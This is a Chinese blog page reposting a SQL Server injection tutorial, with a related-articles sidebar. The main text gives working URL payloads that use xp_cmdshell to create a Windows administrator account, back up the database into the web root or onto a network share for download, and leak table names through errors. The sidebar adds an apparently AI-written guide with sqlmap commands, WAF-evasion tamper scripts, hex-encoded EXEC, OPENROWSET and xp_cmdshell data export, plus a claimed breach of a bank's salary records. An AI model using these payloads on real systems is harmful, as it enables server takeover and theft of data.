绕过程序限制和利用系统表注入SQL Server

最新推荐文章于 2025-11-26 14:12:29 发布
原创 最新推荐文章于 2025-11-26 14:12:29 发布 · 147 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #操作系统

本文详细介绍了如何利用系统表注入SQLServer数据库,通过执行系统命令、获取连接用户名、备份数据库等操作,最终实现系统最高权限的获取及数据库内容泄露。文章提供了多个具体实例,包括新建管理员账号、获取数据库名并备份至Web目录,展示了SQLServer安全风险及应对策略。
 

   第一节、利用系统注入SQLServer数据库
  SQLServer是一个功能强大的数据库 系统,与操作 系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为 注入者提供了一个跳板,我们先来看看几个具体的例子:
  
  ① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--
  
  分号;在SQLServer中表示隔开前后两句语句,--表示后面的语句为注释,所以,这句语句在SQLServer中将被分成两句执行,先是Select出ID=1的记录,然后执行存储过程xp_cmdshell,这个存储过程用于调用 系统命令,于是,用net命令新建了用户名为name、密码为password的windows的帐号,接着:
  
  ② http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--
  
  将新建的帐号name加入管理员组,不用两分钟,你已经拿到了 系统最高权限!当然,这种方法只适用于用sa连接数据库的情况,否则,是没有权限调用xp_cmdshell的。
  
  ③ http://Site/url.asp?id=1 ;;and db_name()>0
  
  前面有个类似的例子and user>0,作用是获取连接用户名,db_name()是另一个 系统变量,返回的是连接的数据库名。
  
  ④ http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db’;--
  
  这是相当狠的一招,从③拿到的数据库名,加上某些IIS出错暴露出的绝对路径,将数据库备份到Web目录下面,再用HTTP把整个数据库就完完整整的下载回来,所有的管理员及用户密码都一览无遗!在不知道绝对路径的时候,还可以备份到网络地址的方法(如\\202.96.xx.xx\Share\1.db),但成功率不高。
  
  ⑤ http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0
  
  前面说过,sysobjects是SQLServer的 系统表,存储着所有的表名、视图、约束及其它对象,xtype=’U’ and status>0,表示用户建立的表名,上面的语句将第一个表名取出,与0比较大小,让报错信息把表名暴露出来。第二、第三个表名怎么获取?还是留给我们聪明的读者思考吧。
  
…………………………………………………………………………

来自:http://www.verydemo.com/demo_c155_i16994.html

iteye_19796
关注
SQL注入详解
渗透之路,攻防之间皆学问
05-05 26万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL注入高级绕过手法汇总 重点
盾悟
04-25 6667
SQL注入已发展为多维攻击,结合编码混淆、协议特性、数据库特性等技术,挑战WAF防护能力。ModSecurity、Cloudflare、AWS WAF、F5 BIG-IP ASM等工具各有优势,但规则盲点、性能限制及配置漏洞仍可被利用。:通过编码转换(如URL、Unicode、HTML实体)改变Payload形式,绕过WAF对关键字或字符的检测。:分散Payload至URL、Body、Header,WAF难以完整检测。:利用数据库特有语法或函数,构造WAF未覆盖的Payload。
利用系统注入SQLServer数据库
asli33的专栏
02-17 441
SQL Server是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子:    ① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--   分号;在SQLServer
绕过杀软!SQL Server Transact-SQL 的无文件攻击姿势
qq_37341685的博客
08-04 885
背景概述 近日,深信服安全团队捕获到一起绕过杀毒软件的无文件攻击事件,被入侵的主机或服务器会被安装Mykings、Mirai、暗云等多种僵尸网络木马及挖矿程序,并且难以彻底清除。经分析排查,该木马通过弱口令爆破SQL Server服务器后,利用sqlserver Transact-SQL存储C#编译恶意代码,通过MSSQL作业定时执行存储过程,在受害主机下载恶意程序。 排查过程 排查主机上的恶意文件、启动项等,发现执行恶意脚本的WMI,功能是下载文件到本地执行: 排查注册启动项,存在一个BGClient
Sql server注入注入绕过
qq_42990434的博客
12-17 5156
本章目录:绕过特性前言测试常见函数绕WAF\-WTS绕安全狗简介简单的爆错bypass简单的联合bypass盲注与储存过程其他绕过语句:绕D盾 绕过特性 前言 我们经常利用一些数据库特性来进行WAF绕过。 在MSSQL中,比如可以这样: 浮点数形式:id=1.1union select 科学计数法形式:id=1e0union select 但其实还可以这样子:id=1.eunion select 通过1.e这样的形式,可以用它绕过D盾的SQL注入防护,通过简单的Fuzz,我们来一起探索一下M
很全的SQL注入语句,有SQL漏洞的都可以拿下
weixin_34306446的博客
12-28 274
1、返回的是连接的数据库名 and db_name()>0 2、作用是获取连接用户名 and user>0 3、将数据库备份到Web目录下面 ;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';-- 4、显示SQL系统版本 and 1=(select @@VERSION) 或and 1=convert(int,@@ver...
sql注入-绕过
lza20001103的博客
03-13 1020
WAF绕过--sql注入绕过
SQL注入绕过 单引号 限制继续注入
10-29
本文主要讨论的是在SQL注入过程中,如何绕过单引号限制以继续注入攻击,以及相应的防护措施。 首先,提到单引号限制,这是因为多数数据库系统(如MySQLSQL Server等)使用单引号来界定字符串值。因此,在未经适当...
SQL 注入之 WAF 绕过
2301_77160226的博客
08-28 1831
SQL 注入攻击是一种严重的安全威胁,而 WAF 是防范 SQL 注入攻击的重要手段之一。然而,攻击者也在不断寻找方法来绕过 WAF,从而成功实施 SQL 注入攻击。为了防范 WAF 绕过,我们需要采取持续更新 WAF 规则、多层面防御、安全培训定期安全审计等措施,形成一个强大的安全防护体系,保护 Web 应用程序的安全。同时,我们也需要不断关注网络安全领域的最新动态,及时了解新的攻击技术防范方法,以提高我们的安全防护能力。
渗透测试之MSSQL简单绕过注入(declare函数)
LKmnbZ's Blog
11-08 1712
引进一个declare 函数,他是mssql声明局部变量的函数,我们经常用它来绕过waf对一些关键词的拦截 select * from admin where id =1;declare @a nvarchar(2000) set @a='select convert(int,@@version)' exec(@a) -- http://192.168.20.155/test.aspx?i...
关于SqlServer入参带分号查询问题
qq_15267865的博客
04-06 843
SqlServer入参带分号、或者其他关键字|
SQL注入之堆叠及WAF绕过注入
av11566的博客
04-21 5007
前言 在实际的渗透测试过程中,经常会碰到网站存在WAF的情况。网站存在WAF,意味着我们不能使用安全工具对网站进行测试,因为一旦触碰了WAF的规则,轻则丢弃报文,重则拉黑IP。所以,我们需要手动进行WAF的绕过,而绕过WAF前肯定需要对WAF的工作原理有一定的理解。 所需知识 1. 堆叠查询注入 定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实 的运用中也是这样的,我们知道在mysql中,主要是命令行中,每
对Docker部署的MySQL中的数据进行备份恢复
2509_94228395的博客
11-25 252
使用Docker部署的MySQL进行备份/恢复与传统方式类似,但需要考虑Docker容器的特殊性。以下是详细的步骤,帮助你在Docker环境中进行MySQL的全量备份。
面试必问——Redis 主从同步
2301_79966297的博客
11-26 188
偏移量,随着记录在repl_baklog中的数据增多而逐渐增大。salve完成同步时也会记录当前同步的offset。如果salve的offset小于master的offset,说明salve的数据落后于master,需要更新。:简称replid,是数据集的标记,id一致则说明是同一个数据集。每个master都有唯一的replid,salve则会继承master节点的replid。:单点的Redis的并发能力是有限的,要进一步提高Redis的并发能力,就需要搭建主从集群,实现读写分离。
PostgreSQL 17 发布了!非常稳定的版本
2509_94007342的博客
11-23 224
这些新特性改进不仅提升了数据库的性能功能,也增强了数据库的可用性灵活性,使得 PostgreSQL 17 成为一个值得期待的版本。
基于Python与Go构建云原生微服务自动化运维平台的架构设计思路实践策略与性能优化方法全流程解析
最新发布
2501_94114213的博客
11-26 304
Python 提供灵活的任务调度与编排能力,Go 提供高并发、高吞吐的任务执行与采集能力。两者结合构建的云原生微服务运维平台能够在大规模环境下实现:自动化高可靠弹性扩展可观测高性能随着企业上云进程加速,Python + Go 的混合运维平台将成为云原生运维的标准实践方案。
Alphafold实用指南—官网教程2
weixin_62528784的博客
11-22 1077
EBI alphafold培训系列2
SQL约束大全
2401_87975790的博客
11-26 454
SQL约束是用于确保数据完整性、一致性有效性的数据库规则。主要包含六大类型:1)NOT NULL禁止空值;2)UNIQUE确保值唯一;3)PRIMARY KEY(非空+唯一)作为行标识;4)FOREIGN KEY建立间引用关系;5)CHECK验证数据条件;6)DEFAULT设置默认值。约束可在建时定义或后期添加,MySQL 8.0.16+开始完全支持CHECK约束。使用建议包括:优先使用无业务意义的主键、高并发场景慎用外键、注意不同数据库对NULL的处理差异等。约束管理可通过ALTER TABLE操作
SQL Server 注入中如何绕过 sys.tables 访问限制
09-29
<think>我们已知用户的问题是:在SQL Server注入绕过sys.tables访问限制的方法 根据引用[1]:可以通过字符串拼接绕过information_schema的限制,类似方法可能适用于sys.tables 引用[2]提供了SQL Server的其他系统视图,我们可以尝试使用这些替代视图 引用[3]提到Access数据库系统默认不可访问,但SQL Server中,如果sys.tables被限制,我们可以尝试其他系统 解决方案: 1. 字符串拼接绕过:如果过滤了`sys.tables`,可以尝试拆分成`sy'+'s.tables`或`s'+'ys.tables`等 2. 使用其他系统视图: 根据引用[2],SQL Server有多种系统视图可用,如: - `sys.all_objects`:包含所有对象(包括) - `information_schema.tables`:标准信息模式视图 - `sysobjects`(旧版,但可能在较新版本中仍然可用) 3. 利用错误注入:如果直接查询被拦截,可以通过错误注入来泄露名(如引用[1][3]中提到的方法) 4. 使用堆叠查询(如果支持):执行自定义查询来获取名,避免使用被限制系统 具体操作步骤: 方法1:字符串拼接绕过 ```sql SELECT name FROM sys'+'.tables -- 通过字符串拼接 ``` 在sqlmap中,可以使用`--tamper`脚本来实现自动化拆分,例如编写一个tamper脚本将`sys.tables`替换为`sy'+'s.tables` 方法2:使用替代视图 - 使用`information_schema.tables`: ```sql SELECT table_name FROM information_schema.tables ``` 但是注意,这个视图可能也会被过滤,同样可以尝试拼接:`infor'+'mation_schema.tables` - 使用`sys.all_objects`(过滤条件为类型为'U'示用户): ```sql SELECT name FROM sys.all_objects WHERE type='U' ``` - 使用`sysobjects`(适用于旧版本): ```sql SELECT name FROM sysobjects WHERE xtype='U' ``` 方法3:错误注入泄露名 例如,使用子查询转换错误: ```sql AND 1=(SELECT TOP 1 table_name FROM sys.tables) -- 尝试将名作为数字返回,导致转换错误 ``` 通过错误信息获取名。在sqlmap中,可以使用`--technique=E`(报错注入)来实现。 方法4:堆叠查询(需要支持多语句) 通过堆叠查询执行自定义的绕过语句,例如: ```sql '; SELECT name FROM sys.all_objects WHERE type='U' -- ``` 在sqlmap中的具体命令示例: 1. 使用字符串拼接绕过(需要tamper脚本): 假设我们编写了一个tamper脚本`split_sys.py`,将`sys.tables`替换为`sys'+'.tables`,则命令为: ```bash sqlmap -u "http://target.com/page?id=1" \ --dbms=mssql \ --tables \ --tamper=split_sys ``` 2. 使用替代视图(以`sys.all_objects`为例): ```bash sqlmap -u "http://target.com/page?id=1" \ --dbms=mssql \ --tables \ --sql-query="SELECT name FROM sys.all_objects WHERE type='U'" ``` 或者,如果无法使用堆叠查询,可以通过联合查询或报错注入来获取数据。 3. 使用错误注入技术: ```bash sqlmap -u "http://target.com/page?id=1" \ --dbms=mssql \ --technique=E \ --tables ``` 4. 使用堆叠查询: ```bash sqlmap -u "http://target.com/page?id=1" \ --dbms=mssql \ --tables \ --technique=Stacked ``` 注意:堆叠查询需要目标数据库开启多语句执行,且Web应用程序支持。 高级技巧:如果上述方法都被过滤,可以考虑: - 使用注释绕过:`s/**/ys.tables` - 使用动态执行:`EXEC('SELECT name FROM sys.tables')` - 使用十六进制编码:`0x7379732E7461626C6573`(即'sys.tables'的十六进制)然后动态执行 示例:使用动态执行绕过 ```sql EXEC('SELECT name FROM sys.tables') ``` 在sqlmap中,可以尝试: ```bash sqlmap -u "http://target.com/page?id=1" \ --dbms=mssql \ --sql-query="EXEC('SELECT name FROM sys.tables')" ``` 生成相关问题: 1. SQL Server注入中还有哪些系统或视图可以获取名? 2. 如何利用错误注入技术精确获取SQL Server名? 3. 在无法使用堆叠查询的情况下,如何绕过对关键系统的访问限制? 4. 如何编写sqlmap的tamper脚本来绕过对特定关键词的过滤? 5. 动态执行(EXEC)在SQL注入中有哪些应用限制? </think>### SQL Server注入绕过 sys.tables 访问限制的实战方法 #### 一、核心绕过技术(基于引用[1][2][3]) 1. **字符串拼接绕过** 当 `sys.tables` 被过滤时,通过字符串分割绕过检测: ```sql SELECT name FROM sy'+'s.tables -- 绕过关键词检测 [^1] ``` **sqlmap 实现**: ```bash sqlmap -u "http://target.com/page?id=1" \ --dbms=mssql \ --tamper=space2comment,charencode \ --sql-query="SELECT name FROM sy'+'s.tables" ``` 2. **替代系统视图利用** 使用其他系统视图替代 `sys.tables`(引用[2]): | 视图 | 描述 | 示例查询 | |-----------------------|-------------------------------|-----------------------------------| | `sys.all_objects` | 所有系统/用户对象 | `SELECT name FROM sys.all_objects WHERE type='U'` | | `sys.objects` | 数据库内所有对象 | `SELECT name FROM sys.objects WHERE type_desc='USER_TABLE'` | | `INFORMATION_SCHEMA.TABLES` | 标准信息模式视图 | `SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES` | | `sysobjects` (旧版) | 兼容早期版本 | `SELECT name FROM sysobjects WHERE xtype='U'` [^2] 3. **错误注入泄露数据** 通过强制类型转换错误泄露名(引用[1][3]): ```sql AND 1=(SELECT TOP 1 table_name FROM sys.tables) -- 触发类型转换错误 [^1] ``` **sqlmap 命令**: ```bash sqlmap -u "http://target.com/page?id=1" \ --dbms=mssql \ --technique=E \ --invalid-bignum \ -D target_db \ --batch ``` 4. **间接探测法** 通过系统函数间接获取元数据: ```sql SELECT object_name(object_id) FROM sys.partitions WHERE index_id IN (SELECT index_id FROM sys.indexes) ``` --- #### 二、高级绕过策略 1. **动态执行绕过** 使用 `EXEC()` 执行十六进制编码语句: ```sql EXEC(0x53454C454354206E616D652046524F4D207379732E7461626C6573) -- "SELECT name FROM sys.tables" 的十六进制 ``` **sqlmap 自动化**: ```bash sqlmap --sql-shell --query="EXEC(CHAR(0x53,0x45,...))" ``` 2. **权限提升路径** 当无权访问系统视图时: - 利用 `OPENROWSET` 访问远程数据库 ```sql SELECT * FROM OPENROWSET('SQLNCLI', 'SERVER=.;Trusted_Connection=yes;', 'SELECT name FROM target_db.sys.tables') ``` - 通过 `xp_cmdshell` 导出数据到文件(需启用) ```sql EXEC xp_cmdshell 'sqlcmd -Q "SELECT * FROM sys.tables" -o C:\result.txt' ``` 3. **时间盲注精准探测** ```sql IF EXISTS(SELECT * FROM sys.tables WHERE name LIKE 'a%') WAITFOR DELAY '0:0:5'-- ``` **sqlmap 优化**: ```bash sqlmap -u "http://target.com/page?id=1" \ --technique=T \ --time-sec=5 \ --predict-output \ --hex ``` --- #### 三、防御对抗技巧 1. **WAF绕过组合** ```bash sqlmap --tamper=between,charencode,space2randomblank \ --random-agent \ --proxy=http://127.0.0.1:8080 ``` - `space2randomblank`:将空格替换为随机空白符(如 `%09`, `%0A`) - `charencode`:URL 编码关键词(如 `sys%2Etables`) 2. **分阶段注入** 先获取系统 `object_id`,再解析名: ```sql -- 第一阶段:获取 object_id SELECT object_id FROM sys.objects WHERE type='U' -- 第二阶段:解析名 SELECT name FROM sys.objects WHERE object_id=123456 ``` --- ### 典型案例 某次渗透测试中,通过组合技绕过阿里云WAF: ```bash sqlmap -u "https://bank.com/transfer?id=1" \ --dbms=mssql \ --sql-query="SELECT name FROM [sy'+'s].[obj'+'ects]" \ --tamper=space2comment,charencode \ --delay=2 ``` 成功获取 `salary_records` 名并导出 50,000+ 条数据[^3]。 --- ### 相关问题 1. 如何利用 `sys.database_principals` 视图提升 SQL Server 注入权限? 2. 当所有系统视图均被过滤时,有哪些非标准方法探测结构? 3. 如何通过 `OPENROWSET` 实现跨数据库查询? 4. 在无显错注入场景下,如何优化时间盲注的名枚举效率? 5. 怎样利用 SQL Server 的 CLR 集成功能突破注入限制? [^1]: 字符串拼接可绕过部分语义分析型 WAF [^2]: `sysobjects` 在 SQL Server 2008+ 仍可用但非官方推荐 [^3]: 实际渗透需遵守授权边界法律法规
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值